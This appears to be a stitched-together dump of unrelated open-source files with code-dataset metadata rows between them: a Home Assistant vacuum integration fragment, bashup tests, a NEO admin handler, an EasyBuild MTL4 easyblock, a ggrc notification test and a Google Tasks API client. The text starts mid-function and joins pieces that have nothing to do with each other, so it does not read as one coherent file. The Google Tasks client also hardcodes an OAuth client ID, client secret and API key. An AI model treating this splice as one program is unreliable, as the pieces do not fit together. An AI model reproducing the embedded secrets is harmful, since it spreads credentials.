fan_speed = FAN_SPEEDS[fan_speed.capitalize()]
else:
try:
fan_speed = int(fan_speed)
except ValueError as exc:
_LOGGER.error(
"Fan speed step not recognized (%s). " "Valid speeds are: %s",
exc,
self.fan_speed_list,
)
return
await self._try_command(
"Unable to set fan speed: %s", self._vacuum.set_fan_speed, fan_speed
)
async def async_return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock."""
await self._try_command("Unable to return home: %s", self._vacuum.home)
async def async_clean_spot(self, **kwargs):
"""Perform a spot clean-up."""
await self._try_command(
"Unable to start the vacuum for a spot clean-up: %s", self._vacuum.spot
)
async def async_locate(self, **kwargs):
"""Locate the vacuum cleaner."""
await self._try_command("Unable to locate the botvac: %s", self._vacuum.find)
async def async_send_command(self, command, params=None, **kwargs):
"""Send raw command."""
await self._try_command(
"Unable to send command to the vacuum: %s",
self._vacuum.raw_command,
command,
params,
)
async def async_remote_control_start(self):
"""Start remote control mode."""
await self._try_command(
"Unable to start remote control the vacuum: %s", self._vacuum.manual_start
)
async def async_remote_control_stop(self):
"""Stop remote control mode."""
await self._try_command(
"Unable to stop remote control the vacuum: %s", self._vacuum.manual_stop
)
async def async_remote_control_move(
self, rotation: int = 0, velocity: float = 0.3, duration: int = 1500
):
"""Move vacuum with remote control mode."""
await self._try_command(
"Unable to move with remote control the vacuum: %s",
self._vacuum.manual_control,
velocity=velocity,
rotation=rotation,
duration=duration,
)
async def async_remote_control_move_step(
self, rotation: int = 0, velocity: float = 0.2, duration: int = 1500
):
"""Move vacuum one step with remote control mode."""
await self._try_command(
"Unable to remote control the vacuum: %s",
self._vacuum.manual_control_once,
velocity=velocity,
rotation=rotation,
duration=duration,
)
def update(self):
"""Fetch state from the device."""
try:
state = self._vacuum.status()
self.vacuum_state = state
self.consumable_state = self._vacuum.consumable_status()
self.clean_history = self._vacuum.clean_history()
self.last_clean = self._vacuum.last_clean_details()
self.dnd_state = self._vacuum.dnd_status()
self._available = True
except OSError as exc:
_LOGGER.error("Got OSError while fetching the state: %s", exc)
except DeviceException as exc:
_LOGGER.warning("Got exception while fetching the state: %s", exc)
async def async_clean_zone(self, zone, repeats=1):
"""Clean selected area for the number of repeats indicated."""
for _zone in zone:
_zone.append(repeats)
_LOGGER.debug("Zone with repeats: %s", zone)
try:
await self.hass.async_add_executor_job(self._vacuum.zoned_clean, zone)
except (OSError, DeviceException) as exc:
_LOGGER.error("Unable to send zoned_clean command to the vacuum: %s", exc)
| apache-2.0 | 5,748,690,026,502,680,000 | 32.2 | 88 | 0.58104 | false |
themattrix/bashup | bashup/test/test_bashup.py | 1 | 6069 | import subprocess
import os
import itertools
import textwrap
import pathlib2 as pathlib
import pytest
import temporary
from .. import test
# Compile some bashup and run it against multiple versions of bash. The versions are expected to be found in
# $BASH_VERSIONS_DIR. If none are found, or the environment variable is not set, the tests are skipped.
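# For example (illustrative layout only, not required by the suite): with
#   BASH_VERSIONS_DIR=/opt/bash-builds  containing  bash-4.3  bash-4.4  bash-5.0
# __find_bash_binaries() below globs 'bash*' inside that directory and a separate
# test case is generated for each binary found.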
def test_compiled_bash(): # pragma: no cover
bash_binaries = __find_bash_binaries()
if not bash_binaries:
pytest.skip('bash executable not found')
for bash_binary in bash_binaries:
yield __assert_compiled_bash, bash_binary, __BASHUP_STR, __EXPECTED_OUTPUT, 55
# Compile some bashup and run it! This will only work if bash exists on the system. Otherwise the test is skipped.
def test_direct_run(): # pragma: no cover
if not __is_bash_in_path():
pytest.skip('bash executable not found')
if not __is_bashup_in_path():
pytest.skip('bashup executable not found')
with temporary.temp_file(__BASHUP_STR) as in_file:
p = subprocess.Popen(
args=('bashup', '--run', str(in_file)),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = [o.decode('utf-8').strip() for o in p.communicate()]
test.assert_eq(stdout, __EXPECTED_OUTPUT)
assert p.returncode == 55
def test_docopt(): # pragma: no cover
bash_binaries = __find_bash_binaries()
if not bash_binaries:
pytest.skip('bash executable not found')
docopt_str = textwrap.dedent("""
#!/bin/bash
#
# Naval Fate.
#
# Usage:
# naval_fate ship new <name>...
# naval_fate ship <name> move <x> <y> [--speed=<kn>]
# naval_fate ship shoot <x> <y>
# naval_fate mine (set|remove) <x> <y> [--moored|--drifting]
# naval_fate -h | --help
# naval_fate --version
#
# Options:
# -h --help Show this screen.
# --version Show version.
# --speed=<kn> Speed in knots [default: 10].
# --moored Moored (anchored) mine.
# --drifting Drifting mine.
#
# Version:
# Naval Fate 2.0
args=("${@}")
printf '%s\n' 'args=('
for i in "${!args[@]}"; do
printf ' [%q]=%q\n' "${i}" "${args[${i}]}"
done
printf ')\n'
""").strip()
expected_return_code = 0
# @fn main {
# @echo @args
# }
#
# @sourced || {
# @docopt
# main
# }
args_and_expected_output = (
(('ship', 'new', ' ship name'),
textwrap.dedent("""
args=(
[0]=ship
[1]=new
[2]=\\ \\ ship\\ \\ name
)
""").strip()),
(('ship', ' ship name', 'move', '-100', '200', '--speed=5.5'),
textwrap.dedent("""
args=(
[0]=ship
[1]=\\ \\ ship\\ \\ name
[2]=move
[3]=-100
[4]=200
[5]=--speed=5.5
)
""").strip()),
)
parameters = itertools.product(bash_binaries, args_and_expected_output)
for bash_binary, (script_args, expected_output) in parameters:
yield __assert_compiled_bash, bash_binary, docopt_str, expected_output, expected_return_code, script_args
#
# Test Helpers
#
__BASHUP_STR = textwrap.dedent("""
#!/bin/bash
@fn hi greeting='Hello', target='World' {
echo "${greeting}, ${target}!$@"
}
# We could do this with grep, but this way is pure bash.
@fn filter regex {
while read line; do
if [[ ${line} =~ ${regex} ]]; then
echo "${line}"
fi
done
}
# Ensure that default parameters work and can be overridden.
hi
hi --target="Human"
hi --greeting="Greetings"
hi --greeting="Greetings" --target="Human"
hi --greeting="Greetings" --target="Human" " Have" "fun!"
# Ensure that piping between fns works.
{
hi --greeting="What now" --target="Human?"
hi --greeting="Welcome" --target="Cyborg"
hi --greeting="Hi" --target="human"
} | filter --regex="[Hh]uman"
exit 55
""").strip()
__EXPECTED_OUTPUT = '\n'.join((
'Hello, World!',
'Hello, Human!',
'Greetings, World!',
'Greetings, Human!',
'Greetings, Human! Have fun!',
'What now, Human?!',
'Hi, human!'))
def __find_bash_binaries():
try:
return tuple((str(p) for p in pathlib.Path(os.environ['BASH_VERSIONS_DIR']).glob('bash*')))
except KeyError: # pragma: no cover
return () # pragma: no cover
def __is_bash_in_path():
try:
subprocess.check_call(('bash', '-c', ':'))
return True # pragma: no cover
except (subprocess.CalledProcessError, OSError): # pragma: no cover
return False # pragma: no cover
def __is_bashup_in_path():
try:
subprocess.check_call(('bashup', '--version'))
return True # pragma: no cover
except (subprocess.CalledProcessError, OSError): # pragma: no cover
return False # pragma: no cover
@temporary.in_temp_dir()
def __assert_compiled_bash(
bash_binary,
bashup_str,
expected_output,
expected_return_code,
script_args=()): # pragma: no cover
with temporary.temp_file(bashup_str) as in_file:
subprocess.check_call(args=(
'bashup',
'--in', str(in_file),
'--out', 'out.sh'))
p = subprocess.Popen(
args=(bash_binary, 'out.sh') + tuple(script_args),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = [o.decode('UTF-8').strip() for o in p.communicate()]
test.assert_eq(stdout, expected_output)
assert p.returncode == expected_return_code
| mit | 6,559,511,140,477,054,000 | 27.097222 | 114 | 0.526116 | false |
vpelletier/neoppod | neo/admin/handler.py | 1 | 5095 | #
# Copyright (C) 2009-2016 Nexedi SA
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from neo.lib import logging, protocol
from neo.lib.handler import EventHandler
from neo.lib.protocol import uuid_str, Packets
from neo.lib.exception import PrimaryFailure
def check_primary_master(func):
def wrapper(self, *args, **kw):
if self.app.bootstrapped:
return func(self, *args, **kw)
raise protocol.NotReadyError('Not connected to a primary master.')
return wrapper
def forward_ask(klass):
return check_primary_master(lambda self, conn, *args, **kw:
self.app.master_conn.ask(klass(*args, **kw),
conn=conn, msg_id=conn.getPeerId()))
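# Note: forward_ask() builds handler methods that simply relay an admin request to
# the primary master.  The originating admin connection and its message id are
# attached to the ask() call so that, when the master answers, the dispatch() method
# of MasterEventHandler below can route the answer back to the waiting admin client.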
class AdminEventHandler(EventHandler):
"""This class deals with events for administrating cluster."""
@check_primary_master
def askPartitionList(self, conn, min_offset, max_offset, uuid):
logging.info("ask partition list from %s to %s for %s",
min_offset, max_offset, uuid_str(uuid))
self.app.sendPartitionTable(conn, min_offset, max_offset, uuid)
@check_primary_master
def askNodeList(self, conn, node_type):
if node_type is None:
node_type = 'all'
node_filter = None
else:
node_filter = lambda n: n.getType() is node_type
logging.info("ask list of %s nodes", node_type)
node_list = self.app.nm.getList(node_filter)
node_information_list = [node.asTuple() for node in node_list ]
p = Packets.AnswerNodeList(node_information_list)
conn.answer(p)
@check_primary_master
def askClusterState(self, conn):
conn.answer(Packets.AnswerClusterState(self.app.cluster_state))
@check_primary_master
def askPrimary(self, conn):
master_node = self.app.master_node
conn.answer(Packets.AnswerPrimary(master_node.getUUID()))
askLastIDs = forward_ask(Packets.AskLastIDs)
askLastTransaction = forward_ask(Packets.AskLastTransaction)
addPendingNodes = forward_ask(Packets.AddPendingNodes)
askRecovery = forward_ask(Packets.AskRecovery)
tweakPartitionTable = forward_ask(Packets.TweakPartitionTable)
setClusterState = forward_ask(Packets.SetClusterState)
setNodeState = forward_ask(Packets.SetNodeState)
checkReplicas = forward_ask(Packets.CheckReplicas)
truncate = forward_ask(Packets.Truncate)
class MasterEventHandler(EventHandler):
""" This class is just used to dispacth message to right handler"""
def _connectionLost(self, conn):
app = self.app
if app.listening_conn: # if running
assert app.master_conn in (conn, None)
conn.cancelRequests("connection to master lost")
app.reset()
app.uuid = None
raise PrimaryFailure
def connectionFailed(self, conn):
self._connectionLost(conn)
def connectionClosed(self, conn):
self._connectionLost(conn)
def dispatch(self, conn, packet, kw={}):
if 'conn' in kw:
# expected answer
if packet.isResponse():
packet.setId(kw['msg_id'])
kw['conn'].answer(packet)
else:
self.app.request_handler.dispatch(conn, packet, kw)
else:
# unexpected answers and notifications
super(MasterEventHandler, self).dispatch(conn, packet, kw)
def answerClusterState(self, conn, state):
self.app.cluster_state = state
def answerNodeInformation(self, conn):
        # XXX: This will no longer exist once the initialization module is
        # implemented to factorize code (as done for bootstrap)
logging.debug("answerNodeInformation")
def notifyPartitionChanges(self, conn, ptid, cell_list):
self.app.pt.update(ptid, cell_list, self.app.nm)
def answerPartitionTable(self, conn, ptid, row_list):
self.app.pt.load(ptid, row_list, self.app.nm)
self.app.bootstrapped = True
def sendPartitionTable(self, conn, ptid, row_list):
if self.app.bootstrapped:
self.app.pt.load(ptid, row_list, self.app.nm)
def notifyClusterInformation(self, conn, cluster_state):
self.app.cluster_state = cluster_state
def notifyNodeInformation(self, conn, node_list):
self.app.nm.update(node_list)
class MasterRequestEventHandler(EventHandler):
""" This class handle all answer from primary master node"""
# XXX: to be deleted ?
| gpl-2.0 | 7,400,558,522,298,591,000 | 37.308271 | 78 | 0.671443 | false |
Maslor/freshman-berries | FreshmanClientV8.py | 1 | 1046 | # -*- encoding: latin1 -*-
#FRESHMAN BERRIES
#Client
#Version: 8.1
#Author: NEETI
import socket
def enviar( mensagem ):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
servidor=('neetiproj.tagus.ist.utl.pt', 4000)
sock.connect( servidor )
mensagens = []
try:
msg = mensagem.encode('latin1')
sock.sendall( msg )
if ( mensagem[:2] == "/r" ):
while True:
data = sock.recv(2048)
data = data.decode('latin1')
if ( data is not None ):
mensagens.append(data)
break;
finally:
sock.close()
return mensagens
def menu():
a = None
while ( a is not "/x" ):
a = str(input(": "))
d = enviar(a)
if ( d is not None ):
for m in d:
print(m)
''' try:
menu()
except Exception as ex:
print (ex)
input() ''' | gpl-2.0 | -5,482,627,804,460,246,000 | 21.288889 | 60 | 0.441683 | false |
boegel/easybuild-easyblocks | easybuild/easyblocks/m/mtl4.py | 1 | 1877 | ##
# Copyright 2009-2020 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for MTL4, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
"""
import os
from easybuild.easyblocks.generic.tarball import Tarball
class EB_MTL4(Tarball):
"""Support for installing MTL4."""
def sanity_check_step(self):
"""Custom sanity check for MTL4."""
incpref = os.path.join('include', 'boost', 'numeric')
custom_paths = {
'files': [],
'dirs': [os.path.join(incpref, x) for x in ["itl", "linear_algebra", "meta_math", "mtl"]],
}
super(EB_MTL4, self).sanity_check_step(custom_paths=custom_paths)
def make_module_req_guess(self):
"""Adjust CPATH for MTL4."""
guesses = super(EB_MTL4, self).make_module_req_guess()
guesses.update({'CPATH': 'include'})
return guesses
| gpl-2.0 | -2,865,124,163,492,093,400 | 32.517857 | 102 | 0.689398 | false |
prasannav7/ggrc-core | test/integration/ggrc_workflows/notifications/test_recurring_cycles.py | 1 | 3523 | # Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: [email protected]
# Maintained By: [email protected]
from integration.ggrc import TestCase
from freezegun import freeze_time
from mock import patch
from ggrc.notifications import common
from ggrc.models import Person
from integration.ggrc_workflows.generator import WorkflowsGenerator
from integration.ggrc.api_helper import Api
from integration.ggrc.generator import ObjectGenerator
class TestRecurringCycleNotifications(TestCase):
def setUp(self):
TestCase.setUp(self)
self.api = Api()
self.generator = WorkflowsGenerator()
self.object_generator = ObjectGenerator()
_, self.assignee = self.object_generator.generate_person(
user_role="gGRC Admin")
self.create_test_cases()
def tearDown(self):
pass
def test_cycle_starts_in_less_than_X_days(self):
with freeze_time("2015-02-01"):
_, wf = self.generator.generate_workflow(self.quarterly_wf_1)
response, wf = self.generator.activate_workflow(wf)
self.assert200(response)
assignee = Person.query.get(self.assignee.id)
with freeze_time("2015-01-01"):
_, notif_data = common.get_todays_notifications()
self.assertNotIn(assignee.email, notif_data)
with freeze_time("2015-01-29"):
_, notif_data = common.get_todays_notifications()
self.assertIn(assignee.email, notif_data)
with freeze_time("2015-02-01"):
_, notif_data = common.get_todays_notifications()
self.assertIn(assignee.email, notif_data)
# TODO: this should mock google email api.
@patch("ggrc.notifications.common.send_email")
def test_marking_sent_notifications(self, mail_mock):
mail_mock.return_value = True
with freeze_time("2015-02-01"):
_, wf = self.generator.generate_workflow(self.quarterly_wf_1)
response, wf = self.generator.activate_workflow(wf)
self.assert200(response)
assignee = Person.query.get(self.assignee.id)
with freeze_time("2015-01-01"):
_, notif_data = common.get_todays_notifications()
self.assertNotIn(assignee.email, notif_data)
with freeze_time("2015-01-29"):
common.send_todays_digest_notifications()
_, notif_data = common.get_todays_notifications()
self.assertNotIn(assignee.email, notif_data)
with freeze_time("2015-02-01"):
_, notif_data = common.get_todays_notifications()
self.assertNotIn(assignee.email, notif_data)
def create_test_cases(self):
def person_dict(person_id):
return {
"href": "/api/people/%d" % person_id,
"id": person_id,
"type": "Person"
}
self.quarterly_wf_1 = {
"title": "quarterly wf 1",
"description": "",
"owners": [person_dict(self.assignee.id)],
"frequency": "quarterly",
"notify_on_change": True,
"task_groups": [{
"title": "tg_1",
"contact": person_dict(self.assignee.id),
"task_group_tasks": [{
"contact": person_dict(self.assignee.id),
"description": self.generator.random_str(100),
"relative_start_day": 5,
"relative_start_month": 2,
"relative_end_day": 25,
"relative_end_month": 2,
},
],
},
]
}
self.all_workflows = [
self.quarterly_wf_1,
]
| apache-2.0 | -6,311,678,311,958,132,000 | 29.903509 | 78 | 0.642066 | false |
christopherjbly/tasks-indicator | src/googletasksapi.py | 1 | 18600 | #!/usr/bin/python
# -*- coding: iso-8859-1 -*-
#
#
# googletasksapi.py
#
# Copyright (C) 2011 Lorenzo Carbonell
# [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
#
from services import GoogleService
from logindialog import LoginDialog
from urllib.parse import urlencode, quote
import os
import json
import io
import comun
import datetime
import time
import uuid
import rfc3339
'''
Dependencies:
python-gflags
'''
OAUTH2_URL = 'https://accounts.google.com/o/oauth2/'
AUTH_URL = 'https://accounts.google.com/o/oauth2/auth'
TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'
REDIRECT_URI = 'http://localhost'
APIKEY = 'AIzaSyDZjnvnk8IBZMUvleSSfGWNnktdKLiKlL0'
CLIENT_ID='197445608333-fd998ofp2ivpj090oputel25imtp7ptk.apps.googleusercontent.com'
CLIENT_SECRET='5So18nKZnWZsKGzOG0pmJUWh'
SCOPE='https://www.googleapis.com/auth/tasks'
class Task(dict):
def __init__(self,entry=None):
thetime = datetime.datetime.now()
position = str(int(time.mktime(thetime.timetuple())))
if len(position)<20:
position = '0'*(20-len(position))+position
self['kind'] = "tasks#task"
self['id'] = str(uuid.uuid4())
self['title'] = None
self['updated'] = rfc3339.rfc3339(thetime)
self['selfLink'] = None
self['parent'] = None
self['position'] = position
self['notes'] = None
self['status'] = 'needsAction'
self['due'] = None
self['completed'] = None
self['deleted'] = False
self['hidden'] = False
self['links'] = []
self['tasklist_id'] = None
self['sync'] = False
self.set_from_entry(entry)
def set_due(self,due):
self['due'] = rfc3339.rfc3339(due)
def get_completed(self):
return (self['status'] == 'completed')
def set_completed(self,iscompleted = True):
if iscompleted:
self['status'] = 'completed'
self['completed'] = rfc3339.rfc3339(datetime.datetime.now())
else:
self['status'] = 'needsAction'
self['completed'] = None
def set_from_entry(self,entry):
if entry is not None:
self.update(entry)
def __str__(self):
ans = ''
for key in self.keys():
ans += '%s: %s\n'%(key,self[key])
return ans
def get_position(self):
if 'position' in self.keys():
return(self['position'])
return None
def __eq__(self,other):
for key in self.keys():
if key is not None and other is not None and key in other.keys():
if self[key] != other[key]:
return False
else:
return False
return True
def __ne__(self,other):
return not self.__eq__(other)
def __lt__(self,other):
return self.get_position() < other.get_position()
def __le__(self,other):
return self.get_position() <= other.get_position()
def __gt__(self,other):
return self.get_position() > other.get_position()
def __ge__(self,other):
return self.get_position() >= other.get_position()
class TaskList(dict):
def __init__(self,entry=None):
self['kind'] = "tasks#taskList"
self['id'] = str(uuid.uuid4())
self['title'] = None
self['updated'] = rfc3339.rfc3339(datetime.datetime.now())
self['selfLink'] = None
self['tasks'] = {}
self.set_from_entry(entry)
def set_from_entry(self,entry):
if entry is not None:
self['kind'] = entry['kind'] if 'kind' in entry.keys() else None
self['id'] = entry['id'] if 'id' in entry.keys() else None
self['title'] = entry['title'] if 'title' in entry.keys() else None
self['updated'] = entry['updated'] if 'updated' in entry.keys() else None
self['selfLink'] = entry['selfLink'] if 'selfLink' in entry.keys() else None
self['tasks'] = {}
print('aqui')
if 'tasks' in entry.keys():
for atask_value in entry['tasks'].values():
atask = Task(atask_value)
self['tasks'][atask['id']] = atask
def set_tasks(self,tasks):
self['tasks'] = tasks
def __str__(self):
ans = ''
for key in self.keys():
ans += '%s: %s\n'%(key,self[key])
return ans
class TaskAlone(object):
def __init__(self):
self.tasklists = {}
def backup(self):
f = open(comun.BACKUP_FILE,'w')
f.write(json.dumps(self.tasklists, sort_keys = True, indent = 4))
f.close()
def create_tasklist(self,title):
tasklist = TaskList()
tasklist['title'] = title
self.tasklists[tasklist['id']] = tasklist
return tasklist
def edit_tasklist(self,tasklist):
self.tasklists[tasklist['id']] = tasklist
return tasklist
def remove_tasklist(self,tasklist):
del self.tasklists[tasklist['id']]
def create_task(self,atasklist,title):
atask = Task()
atask['title'] = title
atask['tasklist_id'] = atasklist['id']
self.tasklists[atasklist['id']]['tasks'][atask['id']] = atask
return atask
def edit_task(self,task):
self.tasklists[task['tasklist_id']]['tasks'][task['id']] = task
return task
def remove_task(self,task):
del self.tasklists[task['tasklist_id']]['tasks'][task['id']]
def move_tasks(self,first_task,last_task):
temporal_position = first_task['position']
first_task['position'] = last_task['position']
last_task['position'] = temporal_position
def move_task_first(self,atask,tasklist_id=None):
tasks = self.get_tasks(tasklist_id)
if len(tasks)>0:
self.move_tasks(atask,tasks[0])
def get_tasklists(self):
return self.tasklists.values()
def get_tasks(self,tasklist_id = None):
tasks = []
if tasklist_id is None:
for tasklist in self.tasklists.values():
tasks.extend(tasklist['tasks'].values())
else:
if tasklist_id in self.tasklists.keys():
tasks = self.tasklists[tasklist_id]['tasks'].values()
return sorted(tasks)
def clear_completed_tasks(self,tasklist_id = None):
for task in self.get_tasks(tasklist_id = tasklist_id):
if task['status'] == 'completed':
self.remove_task(task)
def restore(self):
if os.path.exists(comun.BACKUP_FILE):
f = open(comun.BACKUP_FILE,'r')
data = f.read()
f.close()
midata = json.loads(data)
self.tasklists = {}
for tasklist_value in midata.values():
atasklist = TaskList(tasklist_value)
self.tasklists[atasklist['id']] = atasklist
else:
self.tasklists = {}
class GTAService(GoogleService):
def __init__(self,token_file):
GoogleService.__init__(self,auth_url=AUTH_URL,token_url=TOKEN_URL,redirect_uri=REDIRECT_URI,scope=SCOPE,client_id=CLIENT_ID,client_secret=CLIENT_SECRET,token_file=comun.TOKEN_FILE)
self.tasklists = {}
def read(self):
for atasklist in self._get_tasklists().values():
atasklist['tasks'] = self._get_tasks(atasklist['id'])
self.tasklists[atasklist['id']] = atasklist
def backup(self):
f = open(comun.BACKUP_FILE,'w')
f.write(json.dumps(self.tasklists, sort_keys = True, indent = 4))
f.close()
def restore(self):
f = open(comun.BACKUP_FILE,'r')
data = f.read()
f.close()
midata = json.loads(data)
self.tasklists = {}
for tasklist_value in midata.values():
atasklist = TaskList(tasklist_value)
tasks = {}
for task_value in atasklist['tasks'].values():
atask = Task(task_value)
tasks[atask['id']] = atask
atasklist['tasks'] = tasks
self.tasklists[atasklist['id']] = atasklist
def __do_request(self,method,url,addheaders=None,data=None,params=None,first=True):
headers ={'Authorization':'OAuth %s'%self.access_token}
if addheaders:
headers.update(addheaders)
print(headers)
if data:
if params:
response = self.session.request(method,url,data=data,headers=headers,params=params)
else:
response = self.session.request(method,url,data=data,headers=headers)
else:
if params:
response = self.session.request(method,url,headers=headers,params=params)
else:
response = self.session.request(method,url,headers=headers)
print(response)
if response.status_code == 200 or response.status_code == 201 or response.status_code == 204:
return response
elif (response.status_code == 401 or response.status_code == 403) and first:
ans = self.do_refresh_authorization()
print(ans)
if ans:
return self.__do_request(method,url,addheaders,data,params,first=False)
return None
def _get_tasklists(self):
tasklists = {}
params = {'maxResults':1000000}
response = self.__do_request('GET','https://www.googleapis.com/tasks/v1/users/@me/lists',params=params)
if response and response.text:
try:
answer = json.loads(response.text)
if 'items' in answer.keys():
for item in answer['items']:
atasklist = TaskList(item)
tasklists[atasklist['id']] = atasklist
except:
pass
return tasklists
def _add_tasklist(self,title):
url = 'https://www.googleapis.com/tasks/v1/users/@me/lists'
data = {'kind': 'tasks#taskList','title':title}
body = json.dumps(data).encode('utf-8')
addheaders={'Content-type':'application/json'}
response = self.__do_request('POST',url,addheaders=addheaders,data = body)
if response and response.text:
try:
ans = json.loads(response.text)
print(ans)
return TaskList(ans)
except Exception as e:
print(e)
return None
def _edit_tasklist(self,tasklist_id, title):
params = {'tasklist':tasklist_id}
url = 'https://www.googleapis.com/tasks/v1/users/@me/lists/%s'%(tasklist_id)
data = {
'title':title
}
body = json.dumps(data).encode('utf-8')
addheaders={'Content-type':'application/json'}
response = self.__do_request('PATCH',url,addheaders=addheaders,params=params,data = body)
if response and response.text:
try:
atasklist = TaskList(json.loads(response.text))
except Exception as e:
print(e)
return None
def _delete_tasklist(self,tasklist):
url = 'https://www.googleapis.com/tasks/v1/users/@me/lists/%s'%(tasklist['id'])
params = {'tasklist':tasklist['id']}
response = self.__do_request('DELETE',url,params = params)
if response and response.text:
try:
return True
except Exception as e:
print(e)
return False
def _get_tasks(self,tasklist_id = '@default'):
tasks = {}
params = {'tasklist':tasklist_id,'maxResults':1000000}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks'%(tasklist_id)
response = self.__do_request('GET',url,params=params)
if response and response.text:
try:
answer = json.loads(response.text)
if 'items' in answer.keys():
for item in answer['items']:
atask = Task(item)
atask['tasklist_id'] = tasklist_id
tasks[atask['id']] = atask
except:
pass
return tasks
def _clear_completed_tasks(self,tasklist_id = '@default'):
params = {'tasklist':tasklist_id}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/clear'%(tasklist_id)
addheaders={'Content-Length':'0'}
response = self.__do_request('POST',url,params=params,addheaders=addheaders)
if response is not None:
try:
return True
except Exception as e:
print(e)
return False
def _delete_task(self,tasklist_id,task_id):
params = {'tasklist':tasklist_id,'task':task_id}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks/%s'%(tasklist_id,task_id)
response = self.__do_request('DELETE',url,params=params)
if response and response.text:
try:
return True
except Exception as e:
print(e)
return False
def _edit_task(self,tasklist_id,task_id, title,notes=None, iscompleted=False, due=None, data_completed=None,deleted=False):
params = {'tasklist':tasklist_id,'task':task_id}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks/%s'%(tasklist_id,task_id)
data = {
'kind': 'tasks#task',
'title':title,
'deleted':deleted
}
if notes is not None:
data['notes'] = notes
if iscompleted:
data['status'] = 'completed'
if data_completed is not None:
data['completed'] = rfc3339.rfc3339(data_completed)
else:
data['completed'] = rfc3339.rfc3339(datetime.datetime.now())
else:
data['status'] = 'needsAction'
data['completed'] = None
if due is not None:
data['due'] = rfc3339.rfc3339(due)
body = json.dumps(data).encode('utf-8')
addheaders={'Content-type':'application/json'}
response = self.__do_request('PATCH',url,addheaders=addheaders,params=params,data = body)
if response and response.text:
try:
atask = Task(json.loads(response.text))
atask['tasklist_id'] = tasklist_id
return atask
except Exception as e:
print(e)
return None
def _move_task(self,tasklist_id,task_id,parent_id=None,previous_id=None):
params = {'tasklist':tasklist_id,'task':task_id}
if parent_id is not None:
params['parent'] = parent_id
if previous_id is not None:
params['previous'] = previous_id
addheaders={'Content-Length':'0'}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks/%s/move'%(tasklist_id,task_id)
response = self.__do_request('POST',url,params=params,addheaders=addheaders)
if response and response.text:
try:
atask = Task(json.loads(response.text))
atask['tasklist_id'] = tasklist_id
return atask
except Exception as e:
print(e)
return None
def _add_task(self,tasklist_id,title,notes=None, iscompleted=False, due=None, data_completed=None,deleted=False):
params = {'tasklist':tasklist_id}
url = 'https://www.googleapis.com/tasks/v1/lists/%s/tasks'%(tasklist_id)
data = {
'kind': 'tasks#task',
'title':title,
'deleted':deleted
}
if notes is not None:
data['notes'] = notes
if iscompleted:
data['status'] = 'completed'
if data_completed is not None:
data['completed'] = rfc3339.rfc3339(data_completed)
else:
data['completed'] = rfc3339.rfc3339(datetime.datetime.now())
else:
data['status'] = 'needsAction'
data['completed'] = None
if due is not None:
data['due'] = rfc3339.rfc3339(due)
body = json.dumps(data).encode('utf-8')
addheaders={'Content-type':'application/json'}
response = self.__do_request('POST',url,addheaders=addheaders,params=params,data = body)
if response and response.text:
try:
atask = Task(json.loads(response.text))
atask['tasklist_id'] = tasklist_id
return atask
except Exception as e:
print(e)
return None
def get_tasklists(self):
tasklists = self._get_tasklists()
return tasklists
def create_tasklist(self,title):
return self._add_tasklist(title)
def update_tasklist(self, tasklist):
return self._edit_tasklist(tasklist)
def delete_tasklist(self,tasklist):
return self._delete_tasklist(tasklist)
def clear_completed_tasks(self,tasklist_id = '@default'):
return self._clear_completed_tasks(tasklist_id = tasklist_id)
def get_tasks(self, tasklist_id = '@default'):
tasks = {}
if tasklist_id is None:
for atasklist in self._get_tasklists().values():
for task in self._get_tasks(atasklist['id']).values():
tasks[task['id']] = task
else:
tasks = self._get_tasks(tasklist_id)
return tasks
def create_task(self, tasklist_id = '@default', title = '', notes=None, iscompleted=False, due=None, data_completed=None,deleted=False):
atask = self._add_task(tasklist_id,title,notes=notes, iscompleted=iscompleted, due=due, data_completed=data_completed,deleted=deleted)
return atask
def move_task(self, task_id, previous_task_id,tasklist_id = '@default'):
return self._move_task(tasklist_id,task_id,previous_id=previous_task_id)
def move_task_first(self,task_id, tasklist_id = '@default'):
return self._move_task(tasklist_id,task_id)
def edit_tasklist(self, tasklist_id, title):
return self._edit_tasklist(tasklist_id,title)
